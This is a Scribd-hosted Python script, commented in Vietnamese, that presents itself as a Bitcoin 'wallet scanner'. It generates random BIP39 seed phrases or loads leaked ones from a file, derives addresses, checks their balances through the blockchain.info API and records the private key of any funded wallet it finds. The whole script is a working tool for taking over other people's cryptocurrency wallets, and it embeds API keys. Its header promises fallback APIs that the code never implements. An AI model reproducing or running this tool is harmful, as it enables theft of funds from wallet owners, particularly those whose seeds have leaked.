0% found this document useful (0 votes)
7 views5 pages

11

The document describes a Python script for a Bitcoin wallet scanner that scans seed phrases from 2009 to 2014 using multiple APIs to check balances. It employs asynchronous programming with ThreadPoolExecutor and asyncio for efficient processing, and includes features for secure caching and logging. The script is configurable with parameters such as thread count, batch size, and API keys, and it logs statistics about the scanning process.

Uploaded by

altcoinlx
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
7 views5 pages

11

The document describes a Python script for a Bitcoin wallet scanner that scans seed phrases from 2009 to 2014 using multiple APIs to check balances. It employs asynchronous programming with ThreadPoolExecutor and asyncio for efficient processing, and includes features for secure caching and logging. The script is configurable with parameters such as thread count, batch size, and API keys, and it logs statistics about the scanning process.

Uploaded by

altcoinlx
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

#!

/usr/bin/env python3
"""
BTC Wallet Scanner Pro (2025)
- Quét seed ví Bitcoin từ 2009–2014
- Ưu tiên batch address qua blockchain.info
- Fallback các API miễn phí: blockstream, mempool, sochain, bitaps
- Dùng ThreadPoolExecutor + asyncio event loop chia sẻ
- Tăng batch size, pre-cache address, sinh seed theo sampling năm
"""

import os
import json
import time
import random
import logging
import asyncio
import aiohttp
from pathlib import Path
from typing import List, Dict, Optional
from dataclasses import dataclass, field
from concurrent.futures import ThreadPoolExecutor
from threading import Lock
from cryptography.fernet import Fernet
from bip_utils import (
Bip39MnemonicValidator, Bip39SeedGenerator,
Bip44, Bip44Coins, Bip44Changes, Bip39Languages
)

# ==================== CẤU HÌNH ====================


@dataclass
class Config:
THREADS: int = 100
SEED_BATCH_SIZE: int = 100
TOTAL_BATCHES: int = 100000000
MIN_BALANCE: float = 0.0001
API_TIMEOUT: int = 30
MAX_CACHE_SIZE: int = 1000000000
RATE_LIMIT: int = 3600
ADDRESS_INDEX_RANGE: int = 50
BLOCKCHAIN_API_KEYS: List[str] = field(default_factory=lambda: [
"23e94f49-8066-4149-8c8b-0cf0e0a8d53b", "1e940160-1c99-4aee-9cdf-
72ff1d24a74d"
])
DERIVATION_PATHS: Dict[str, str] = field(default_factory=lambda: {
"legacy": "m/44'/0'/0'/0"
})
WORDLIST_FILE: str = "bip39_english.txt"
RESULT_FILE: str = "found_wallets.txt"
CACHE_FILE: str = "address_cache.json"
LEAK_FILE: str = "leaked_seeds.txt"
LOG_FILE: str = "scanner.log"
KEY_FILE: str = "secret.key"
POPULAR_ADDR_CACHE: str = "popular_addr.json"

# ==================== LOGGING ====================


def setup_logging(config: Config):
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(levelname)s - %(message)s",
handlers=[
logging.FileHandler(config.LOG_FILE, encoding="utf-8"),
logging.StreamHandler()
]
)

# ==================== STATS ====================


class Stats:
def __init__(self):
self.start_time = time.time()
self.seeds_scanned = 0
self.wallets_found = 0
self.addresses_checked = 0
self.api_calls = 0

# ==================== SECURE CACHE ====================


class SecureStorage:
def __init__(self, key_file: str):
if not Path(key_file).exists():
with open(key_file, "wb") as f:
f.write(Fernet.generate_key())
with open(key_file, "rb") as f:
self.cipher = Fernet(f.read())

def encrypt(self, data: str) -> str:


return self.cipher.encrypt(data.encode()).decode()

def decrypt(self, encrypted: str) -> str:


return self.cipher.decrypt(encrypted.encode()).decode()

class AddressCache:
def __init__(self, file: str, max_size: int, secure: SecureStorage):
self.file = file
self.max_size = max_size
self.secure = secure
self.cache = self._load()

def _load(self):
if Path(self.file).exists():
try:
with open(self.file, "r") as f:
encrypted = json.load(f)
return {k: float(self.secure.decrypt(v)) for k, v in
encrypted.items()}
except:
return {}
return {}

def save(self):
with open(self.file, "w") as f:
encrypted = {k: self.secure.encrypt(str(v)) for k, v in
self.cache.items()}
json.dump(encrypted, f, indent=2)

def __getitem__(self, key):


return self.cache.get(key)

def __setitem__(self, key, value):


if len(self.cache) >= self.max_size:
self.cache.pop(next(iter(self.cache)))
self.cache[key] = value

# ==================== SEED GENERATOR (SAMPLING) ====================


class SeedGenerator:
def __init__(self, config: Config):
self.config = config
self.words = self._load_wordlist()
self.validator = Bip39MnemonicValidator(Bip39Languages.ENGLISH)
self.years = [2009, 2010, 2011, 2012, 2013, 2014]
self.weights = [0.30, 0.25, 0.20, 0.15, 0.07, 0.03]

def _load_wordlist(self):
if not Path(self.config.WORDLIST_FILE).exists():
import urllib.request
url =
"https://raw.githubusercontent.com/bitcoin/bips/master/bip-0039/english.txt"
urllib.request.urlretrieve(url, self.config.WORDLIST_FILE)
with open(self.config.WORDLIST_FILE, "r") as f:
return [line.strip() for line in f]

def generate(self):
while True:
year = random.choices(self.years, weights=self.weights)[0]
seed = " ".join(random.choices(self.words, k=12))
if self.validator.IsValid(seed):
return seed

# ==================== MULTI API ====================


class MultiAPI:
def __init__(self, config: Config, session: aiohttp.ClientSession):
self.config = config
self.session = session
self.api_keys = config.BLOCKCHAIN_API_KEYS
self.usage = {k: 0 for k in self.api_keys}

async def check_balances(self, addresses: List[str], stats: Stats) -> Dict[str,


dict]:
results = {}
joined = "|".join(addresses)
key = self.api_keys[0]
url = f"https://blockchain.info/balance?active={joined}&api_code={key}"
try:
async with self.session.get(url, timeout=self.config.API_TIMEOUT) as
resp:
stats.api_calls += 1
if resp.status == 200:
data = await resp.json()
results.update(data)
except:
pass

for addr in addresses:


if addr not in results:
results[addr] = {'final_balance': 0}
return results

# ==================== SCAN SEED ====================


async def scan_seed(seed: str, config: Config, api: MultiAPI,
cache: AddressCache, stats: Stats) -> Optional[str]:
result = []
seed_bytes = Bip39SeedGenerator(seed).Generate()
addresses, info = [], []

for path_name, path in config.DERIVATION_PATHS.items():


for i in range(config.ADDRESS_INDEX_RANGE):
full_path = f"{path}/{i}"
cache_key = f"{seed}:{full_path}"
if cache[cache_key] is not None:
continue
bip = Bip44.FromSeed(seed_bytes, Bip44Coins.BITCOIN)
addr_obj =
bip.Purpose().Coin().Account(0).Change(Bip44Changes.CHAIN_EXT).AddressIndex(i)
address = addr_obj.PublicKey().ToAddress()
private_key = addr_obj.PrivateKey().Raw().ToHex()
addresses.append(address)
info.append((address, private_key, full_path, cache_key, path_name))

balances = await api.check_balances(addresses, stats)


for (address, priv, full_path, key, path_name) in info:
balance = balances.get(address, {}).get("final_balance", 0) / 1e8
stats.addresses_checked += 1
cache[key] = balance
if balance >= config.MIN_BALANCE:
stats.wallets_found += 1
result.append(
f"Type: {path_name}\nAddress: {address}\nBalance: {balance:.8f}
BTC\nPrivate: {priv}\nPath: {full_path}\n"
)

stats.seeds_scanned += 1
return "\n".join(result) if result else None

# ==================== WORKER ====================


loop = asyncio.new_event_loop()
lock = Lock()

def worker(seed: str, config: Config, cache: dict, stats: dict):


async def _run():
async with aiohttp.ClientSession() as session:
api = MultiAPI(config, session)
secure = SecureStorage(config.KEY_FILE)
addr_cache = AddressCache(config.CACHE_FILE, config.MAX_CACHE_SIZE,
secure)
addr_cache.cache.update(cache)
stat = Stats()
result = await scan_seed(seed, config, api, addr_cache, stat)
with lock:
for k in ['seeds_scanned', 'wallets_found', 'addresses_checked',
'api_calls']:
stats[k] += getattr(stat, k)
cache.update(addr_cache.cache)
return result
return asyncio.run(_run())

# ==================== MAIN ====================


def main():
start_time = time.time()
config = Config()
setup_logging(config)
validator = Bip39MnemonicValidator(Bip39Languages.ENGLISH)
sg = SeedGenerator(config)
secure = SecureStorage(config.KEY_FILE)
shared_cache = {}
shared_stats = {'seeds_scanned': 0, 'wallets_found': 0, 'addresses_checked': 0,
'api_calls': 0}
seeds = []

if Path(config.LEAK_FILE).exists():
with open(config.LEAK_FILE, "r", encoding="utf-8") as f:
seeds = [line.strip() for line in f if validator.IsValid(line.strip())]

batch = 0
with ThreadPoolExecutor(max_workers=config.THREADS) as pool:
while batch < config.TOTAL_BATCHES:
if not seeds:
seeds = [sg.generate() for _ in range(config.SEED_BATCH_SIZE)]
futures = [pool.submit(worker, s, config, shared_cache, shared_stats)
for s in seeds]
results = [f.result() for f in futures]
found = [r for r in results if r]
if found:
with open(config.RESULT_FILE, "a", encoding="utf-8") as f:
f.write("\n".join(found) + "\n")
elapsed = time.time() - start_time
speed = shared_stats['seeds_scanned'] / elapsed if elapsed > 0 else 0
logging.info("="*60)
logging.info(f"Seeds scanned :
{shared_stats['seeds_scanned']}")
logging.info(f"Addresses checked :
{shared_stats['addresses_checked']}")
logging.info(f"Wallets with balance :
{shared_stats['wallets_found']}")
logging.info(f"Elapsed time : {elapsed:.2f} seconds")
logging.info(f"Speed : {speed:.2f} seeds/sec")
logging.info("="*60)
seeds = []
batch += 1

AddressCache(config.CACHE_FILE, config.MAX_CACHE_SIZE, secure).save()

if __name__ == "__main__":
asyncio.set_event_loop(loop)
main()

You might also like